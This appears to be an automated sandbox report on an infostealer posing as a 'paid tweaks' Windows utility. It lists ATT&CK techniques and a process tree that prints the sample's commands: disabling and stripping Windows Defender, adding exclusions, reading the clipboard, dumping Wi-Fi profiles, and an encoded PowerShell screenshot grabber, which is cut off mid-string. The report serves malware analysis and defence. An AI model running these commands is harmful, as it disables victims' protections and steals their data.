335e38a7985a1357ffe96c98258a8a8a4e10897a3a5bd97c06de9a8f5bc98c7b

Resubmissions

27/09/2024, 12:24

240927-plfzjasdqn 10

Analysis

max time kernel
98s
max time network
100s
platform
windows10-2004_x64
resource
win10v2004-20240802-en
resource tags

arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
submitted
27/09/2024, 12:24

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Exm Paid Tweaks.exe
Size

7.4MB
MD5

fb85c9ed03b0ba5a1cb056918422b013
SHA1

68e862e622451164142f5143965109097daf3353
SHA256

335e38a7985a1357ffe96c98258a8a8a4e10897a3a5bd97c06de9a8f5bc98c7b
SHA512

832978b77aae80cf12d6feea3bb54c7c5766985e0279c78d4164b2499e8b9c1269f6ce709e4b899fe4687240f47f3673803f29804063c6a7c5ae96468c2178f0
SSDEEP

196608:jY8PgLjv+bhqNVoB0SEsucQZ41JBbIR11tY:c8PwL+9qz80SJHQK1JI1vY

Score

8^/10

collection credential_access defense_evasion discovery execution persistence privilege_escalation spyware stealer upx

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
4804	powershell.exe
2088	powershell.exe
4404	powershell.exe
1420	powershell.exe
4344	powershell.exe

Clipboard Data 1 TTPs 2 IoCs

Adversaries may collect data stored in the clipboard from users copying information within or between applications.

collection

Clipboard Data

T1115

pid	Process
1684	powershell.exe
3824	cmd.exe

Executes dropped EXE 1 IoCs

pid	Process
3924	rar.exe

Loads dropped DLL 16 IoCs

pid	Process
3116	Exm Paid Tweaks.exe
3116	Exm Paid Tweaks.exe
3116	Exm Paid Tweaks.exe
3116	Exm Paid Tweaks.exe
3116	Exm Paid Tweaks.exe
3116	Exm Paid Tweaks.exe
3116	Exm Paid Tweaks.exe
3116	Exm Paid Tweaks.exe
3116	Exm Paid Tweaks.exe
3116	Exm Paid Tweaks.exe
3116	Exm Paid Tweaks.exe
3116	Exm Paid Tweaks.exe
3116	Exm Paid Tweaks.exe
3116	Exm Paid Tweaks.exe
3116	Exm Paid Tweaks.exe
3116	Exm Paid Tweaks.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
27	ip-api.com

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Enumerates processes with tasklist 1 TTPs 3 IoCs

discovery

Process Discovery

T1057

pid	Process
3876	tasklist.exe
464	tasklist.exe
4776	tasklist.exe

UPX packed file 57 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/files/0x00070000000234bb-21.dat	upx
behavioral2/memory/3116-25-0x00007FF98AAB0000-0x00007FF98B09E000-memory.dmp	upx
behavioral2/files/0x00070000000234ae-27.dat	upx
behavioral2/memory/3116-30-0x00007FF99D420000-0x00007FF99D444000-memory.dmp	upx
behavioral2/memory/3116-32-0x00007FF9A2690000-0x00007FF9A269F000-memory.dmp	upx
behavioral2/files/0x00070000000234b9-31.dat	upx
behavioral2/files/0x00070000000234b5-48.dat	upx
behavioral2/files/0x00070000000234b4-47.dat	upx
behavioral2/files/0x00070000000234b3-46.dat	upx
behavioral2/files/0x00070000000234b2-45.dat	upx
behavioral2/files/0x00070000000234b1-44.dat	upx
behavioral2/files/0x00070000000234b0-43.dat	upx
behavioral2/files/0x00070000000234af-42.dat	upx
behavioral2/files/0x00070000000234ad-41.dat	upx
behavioral2/files/0x00070000000234c0-40.dat	upx
behavioral2/files/0x00070000000234bf-39.dat	upx
behavioral2/files/0x00070000000234be-38.dat	upx
behavioral2/files/0x00070000000234ba-35.dat	upx
behavioral2/files/0x00070000000234b8-34.dat	upx
behavioral2/memory/3116-54-0x00007FF99D3F0000-0x00007FF99D41D000-memory.dmp	upx
behavioral2/memory/3116-57-0x00007FF999760000-0x00007FF999779000-memory.dmp	upx
behavioral2/memory/3116-58-0x00007FF999730000-0x00007FF999753000-memory.dmp	upx
behavioral2/memory/3116-60-0x00007FF98A440000-0x00007FF98A5B6000-memory.dmp	upx
behavioral2/memory/3116-62-0x00007FF9A1690000-0x00007FF9A16A9000-memory.dmp	upx
behavioral2/memory/3116-64-0x00007FF99D3B0000-0x00007FF99D3BD000-memory.dmp	upx
behavioral2/memory/3116-68-0x00007FF98AAB0000-0x00007FF98B09E000-memory.dmp	upx
behavioral2/memory/3116-70-0x00007FF999260000-0x00007FF99932D000-memory.dmp	upx
behavioral2/memory/3116-69-0x00007FF999A20000-0x00007FF999A53000-memory.dmp	upx
behavioral2/memory/3116-71-0x00007FF989F10000-0x00007FF98A432000-memory.dmp	upx
behavioral2/memory/3116-73-0x00007FF99D420000-0x00007FF99D444000-memory.dmp	upx
behavioral2/memory/3116-80-0x00007FF998D20000-0x00007FF998E3C000-memory.dmp	upx
behavioral2/memory/3116-76-0x00007FF99D2C0000-0x00007FF99D2CD000-memory.dmp	upx
behavioral2/memory/3116-75-0x00007FF9995B0000-0x00007FF9995C4000-memory.dmp	upx
behavioral2/memory/3116-170-0x00007FF999730000-0x00007FF999753000-memory.dmp	upx
behavioral2/memory/3116-220-0x00007FF98A440000-0x00007FF98A5B6000-memory.dmp	upx
behavioral2/memory/3116-258-0x00007FF9A1690000-0x00007FF9A16A9000-memory.dmp	upx
behavioral2/memory/3116-277-0x00007FF999A20000-0x00007FF999A53000-memory.dmp	upx
behavioral2/memory/3116-278-0x00007FF999260000-0x00007FF99932D000-memory.dmp	upx
behavioral2/memory/3116-279-0x00007FF989F10000-0x00007FF98A432000-memory.dmp	upx
behavioral2/memory/3116-301-0x00007FF98AAB0000-0x00007FF98B09E000-memory.dmp	upx
behavioral2/memory/3116-307-0x00007FF98A440000-0x00007FF98A5B6000-memory.dmp	upx
behavioral2/memory/3116-302-0x00007FF99D420000-0x00007FF99D444000-memory.dmp	upx
behavioral2/memory/3116-316-0x00007FF98AAB0000-0x00007FF98B09E000-memory.dmp	upx
behavioral2/memory/3116-331-0x00007FF999730000-0x00007FF999753000-memory.dmp	upx
behavioral2/memory/3116-344-0x00007FF998D20000-0x00007FF998E3C000-memory.dmp	upx
behavioral2/memory/3116-343-0x00007FF989F10000-0x00007FF98A432000-memory.dmp	upx
behavioral2/memory/3116-342-0x00007FF9995B0000-0x00007FF9995C4000-memory.dmp	upx
behavioral2/memory/3116-341-0x00007FF999260000-0x00007FF99932D000-memory.dmp	upx
behavioral2/memory/3116-340-0x00007FF999A20000-0x00007FF999A53000-memory.dmp	upx
behavioral2/memory/3116-339-0x00007FF99D3B0000-0x00007FF99D3BD000-memory.dmp	upx
behavioral2/memory/3116-338-0x00007FF9A1690000-0x00007FF9A16A9000-memory.dmp	upx
behavioral2/memory/3116-337-0x00007FF98A440000-0x00007FF98A5B6000-memory.dmp	upx
behavioral2/memory/3116-336-0x00007FF99D2C0000-0x00007FF99D2CD000-memory.dmp	upx
behavioral2/memory/3116-335-0x00007FF999760000-0x00007FF999779000-memory.dmp	upx
behavioral2/memory/3116-334-0x00007FF99D3F0000-0x00007FF99D41D000-memory.dmp	upx
behavioral2/memory/3116-333-0x00007FF9A2690000-0x00007FF9A269F000-memory.dmp	upx
behavioral2/memory/3116-332-0x00007FF99D420000-0x00007FF99D444000-memory.dmp	upx

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

discovery

Wi-Fi Discovery

T1016.002

pid	Process
3136	netsh.exe
2084	cmd.exe

Detects videocard installed 1 TTPs 1 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
1620	WMIC.exe

Gathers system information 1 TTPs 1 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
3176	systeminfo.exe

Suspicious behavior: EnumeratesProcesses 25 IoCs

pid	Process
1420	powershell.exe
4804	powershell.exe
4804	powershell.exe
2088	powershell.exe
2088	powershell.exe
1684	powershell.exe
1684	powershell.exe
1420	powershell.exe
1420	powershell.exe
2868	powershell.exe
2868	powershell.exe
2088	powershell.exe
2088	powershell.exe
4804	powershell.exe
4804	powershell.exe
1684	powershell.exe
2868	powershell.exe
4344	powershell.exe
4344	powershell.exe
2120	powershell.exe
2120	powershell.exe
4404	powershell.exe
4404	powershell.exe
692	powershell.exe
692	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	464	tasklist.exe
Token: SeDebugPrivilege	3876	tasklist.exe
Token: SeDebugPrivilege	1420	powershell.exe
Token: SeDebugPrivilege	4804	powershell.exe
Token: SeDebugPrivilege	2088	powershell.exe
Token: SeIncreaseQuotaPrivilege	4008	WMIC.exe
Token: SeSecurityPrivilege	4008	WMIC.exe
Token: SeTakeOwnershipPrivilege	4008	WMIC.exe
Token: SeLoadDriverPrivilege	4008	WMIC.exe
Token: SeSystemProfilePrivilege	4008	WMIC.exe
Token: SeSystemtimePrivilege	4008	WMIC.exe
Token: SeProfSingleProcessPrivilege	4008	WMIC.exe
Token: SeIncBasePriorityPrivilege	4008	WMIC.exe
Token: SeCreatePagefilePrivilege	4008	WMIC.exe
Token: SeBackupPrivilege	4008	WMIC.exe
Token: SeRestorePrivilege	4008	WMIC.exe
Token: SeShutdownPrivilege	4008	WMIC.exe
Token: SeDebugPrivilege	4008	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4008	WMIC.exe
Token: SeRemoteShutdownPrivilege	4008	WMIC.exe
Token: SeUndockPrivilege	4008	WMIC.exe
Token: SeManageVolumePrivilege	4008	WMIC.exe
Token: 33	4008	WMIC.exe
Token: 34	4008	WMIC.exe
Token: 35	4008	WMIC.exe
Token: 36	4008	WMIC.exe
Token: SeDebugPrivilege	4776	tasklist.exe
Token: SeDebugPrivilege	1684	powershell.exe
Token: SeIncreaseQuotaPrivilege	4008	WMIC.exe
Token: SeSecurityPrivilege	4008	WMIC.exe
Token: SeTakeOwnershipPrivilege	4008	WMIC.exe
Token: SeLoadDriverPrivilege	4008	WMIC.exe
Token: SeSystemProfilePrivilege	4008	WMIC.exe
Token: SeSystemtimePrivilege	4008	WMIC.exe
Token: SeProfSingleProcessPrivilege	4008	WMIC.exe
Token: SeIncBasePriorityPrivilege	4008	WMIC.exe
Token: SeCreatePagefilePrivilege	4008	WMIC.exe
Token: SeBackupPrivilege	4008	WMIC.exe
Token: SeRestorePrivilege	4008	WMIC.exe
Token: SeShutdownPrivilege	4008	WMIC.exe
Token: SeDebugPrivilege	4008	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4008	WMIC.exe
Token: SeRemoteShutdownPrivilege	4008	WMIC.exe
Token: SeUndockPrivilege	4008	WMIC.exe
Token: SeManageVolumePrivilege	4008	WMIC.exe
Token: 33	4008	WMIC.exe
Token: 34	4008	WMIC.exe
Token: 35	4008	WMIC.exe
Token: 36	4008	WMIC.exe
Token: SeDebugPrivilege	2868	powershell.exe
Token: SeDebugPrivilege	4344	powershell.exe
Token: SeDebugPrivilege	2120	powershell.exe
Token: SeIncreaseQuotaPrivilege	3480	WMIC.exe
Token: SeSecurityPrivilege	3480	WMIC.exe
Token: SeTakeOwnershipPrivilege	3480	WMIC.exe
Token: SeLoadDriverPrivilege	3480	WMIC.exe
Token: SeSystemProfilePrivilege	3480	WMIC.exe
Token: SeSystemtimePrivilege	3480	WMIC.exe
Token: SeProfSingleProcessPrivilege	3480	WMIC.exe
Token: SeIncBasePriorityPrivilege	3480	WMIC.exe
Token: SeCreatePagefilePrivilege	3480	WMIC.exe
Token: SeBackupPrivilege	3480	WMIC.exe
Token: SeRestorePrivilege	3480	WMIC.exe
Token: SeShutdownPrivilege	3480	WMIC.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4172 wrote to memory of 3116	4172	Exm Paid Tweaks.exe	82
PID 4172 wrote to memory of 3116	4172	Exm Paid Tweaks.exe	82
PID 3116 wrote to memory of 1324	3116	Exm Paid Tweaks.exe	83
PID 3116 wrote to memory of 1324	3116	Exm Paid Tweaks.exe	83
PID 3116 wrote to memory of 916	3116	Exm Paid Tweaks.exe	84
PID 3116 wrote to memory of 916	3116	Exm Paid Tweaks.exe	84
PID 3116 wrote to memory of 1280	3116	Exm Paid Tweaks.exe	85
PID 3116 wrote to memory of 1280	3116	Exm Paid Tweaks.exe	85
PID 3116 wrote to memory of 1632	3116	Exm Paid Tweaks.exe	86
PID 3116 wrote to memory of 1632	3116	Exm Paid Tweaks.exe	86
PID 3116 wrote to memory of 436	3116	Exm Paid Tweaks.exe	91
PID 3116 wrote to memory of 436	3116	Exm Paid Tweaks.exe	91
PID 3116 wrote to memory of 3576	3116	Exm Paid Tweaks.exe	92
PID 3116 wrote to memory of 3576	3116	Exm Paid Tweaks.exe	92
PID 3576 wrote to memory of 464	3576	cmd.exe	95
PID 3576 wrote to memory of 464	3576	cmd.exe	95
PID 436 wrote to memory of 3876	436	cmd.exe	96
PID 436 wrote to memory of 3876	436	cmd.exe	96
PID 1324 wrote to memory of 4804	1324	cmd.exe	97
PID 1324 wrote to memory of 4804	1324	cmd.exe	97
PID 1632 wrote to memory of 2088	1632	cmd.exe	98
PID 1632 wrote to memory of 2088	1632	cmd.exe	98
PID 916 wrote to memory of 1420	916	cmd.exe	99
PID 916 wrote to memory of 1420	916	cmd.exe	99
PID 3116 wrote to memory of 4308	3116	Exm Paid Tweaks.exe	100
PID 3116 wrote to memory of 4308	3116	Exm Paid Tweaks.exe	100
PID 3116 wrote to memory of 3824	3116	Exm Paid Tweaks.exe	101
PID 3116 wrote to memory of 3824	3116	Exm Paid Tweaks.exe	101
PID 3116 wrote to memory of 1168	3116	Exm Paid Tweaks.exe	103
PID 3116 wrote to memory of 1168	3116	Exm Paid Tweaks.exe	103
PID 3116 wrote to memory of 3644	3116	Exm Paid Tweaks.exe	107
PID 3116 wrote to memory of 3644	3116	Exm Paid Tweaks.exe	107
PID 3116 wrote to memory of 2084	3116	Exm Paid Tweaks.exe	109
PID 3116 wrote to memory of 2084	3116	Exm Paid Tweaks.exe	109
PID 3116 wrote to memory of 1344	3116	Exm Paid Tweaks.exe	110
PID 3116 wrote to memory of 1344	3116	Exm Paid Tweaks.exe	110
PID 3116 wrote to memory of 3060	3116	Exm Paid Tweaks.exe	113
PID 3116 wrote to memory of 3060	3116	Exm Paid Tweaks.exe	113
PID 1280 wrote to memory of 4832	1280	cmd.exe	114
PID 1280 wrote to memory of 4832	1280	cmd.exe	114
PID 1168 wrote to memory of 4776	1168	cmd.exe	116
PID 1168 wrote to memory of 4776	1168	cmd.exe	116
PID 4308 wrote to memory of 4008	4308	cmd.exe	117
PID 4308 wrote to memory of 4008	4308	cmd.exe	117
PID 3824 wrote to memory of 1684	3824	cmd.exe	118
PID 3824 wrote to memory of 1684	3824	cmd.exe	118
PID 2084 wrote to memory of 3136	2084	cmd.exe	143
PID 2084 wrote to memory of 3136	2084	cmd.exe	143
PID 3644 wrote to memory of 4348	3644	cmd.exe	120
PID 3644 wrote to memory of 4348	3644	cmd.exe	120
PID 3060 wrote to memory of 2868	3060	cmd.exe	121
PID 3060 wrote to memory of 2868	3060	cmd.exe	121
PID 1344 wrote to memory of 3176	1344	cmd.exe	122
PID 1344 wrote to memory of 3176	1344	cmd.exe	122
PID 3116 wrote to memory of 4840	3116	Exm Paid Tweaks.exe	123
PID 3116 wrote to memory of 4840	3116	Exm Paid Tweaks.exe	123
PID 4840 wrote to memory of 2936	4840	cmd.exe	125
PID 4840 wrote to memory of 2936	4840	cmd.exe	125
PID 3116 wrote to memory of 2664	3116	Exm Paid Tweaks.exe	126
PID 3116 wrote to memory of 2664	3116	Exm Paid Tweaks.exe	126
PID 2664 wrote to memory of 1828	2664	cmd.exe	128
PID 2664 wrote to memory of 1828	2664	cmd.exe	128
PID 3116 wrote to memory of 4132	3116	Exm Paid Tweaks.exe	129
PID 3116 wrote to memory of 4132	3116	Exm Paid Tweaks.exe	129

C:\Users\Admin\AppData\Local\Temp\Exm Paid Tweaks.exe
"C:\Users\Admin\AppData\Local\Temp\Exm Paid Tweaks.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:4172
- C:\Users\Admin\AppData\Local\Temp\Exm Paid Tweaks.exe
  "C:\Users\Admin\AppData\Local\Temp\Exm Paid Tweaks.exe"
  2⤵
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:3116
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Exm Paid Tweaks.exe'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1324
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Exm Paid Tweaks.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4804
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:916
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1420
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Are you sure you know what you are doing?', 0, '.', 16+16);close()""
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1280
  - - C:\Windows\system32\mshta.exe
      mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Are you sure you know what you are doing?', 0, '.', 16+16);close()"
      4⤵
      PID:4832
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ‌‎ .scr'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1632
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ‌‎ .scr'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2088
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:436
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:3876
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3576
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:464
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4308
  - - C:\Windows\System32\Wbem\WMIC.exe
      WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:4008
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
    3⤵
    - Clipboard Data
    - Suspicious use of WriteProcessMemory
    PID:3824
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      Clipboard Data
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1684
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1168
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:4776
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3644
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:4348
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
    3⤵
    - System Network Configuration Discovery: Wi-Fi Discovery
    - Suspicious use of WriteProcessMemory
    PID:2084
  - - C:\Windows\system32\netsh.exe
      netsh wlan show profile
      4⤵
      Event Triggered Execution: Netsh Helper DLL
      System Network Configuration Discovery: Wi-Fi Discovery
      PID:3136
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "systeminfo"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1344
  - - C:\Windows\system32\systeminfo.exe
      systeminfo
      4⤵
      Gathers system information
      PID:3176
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAL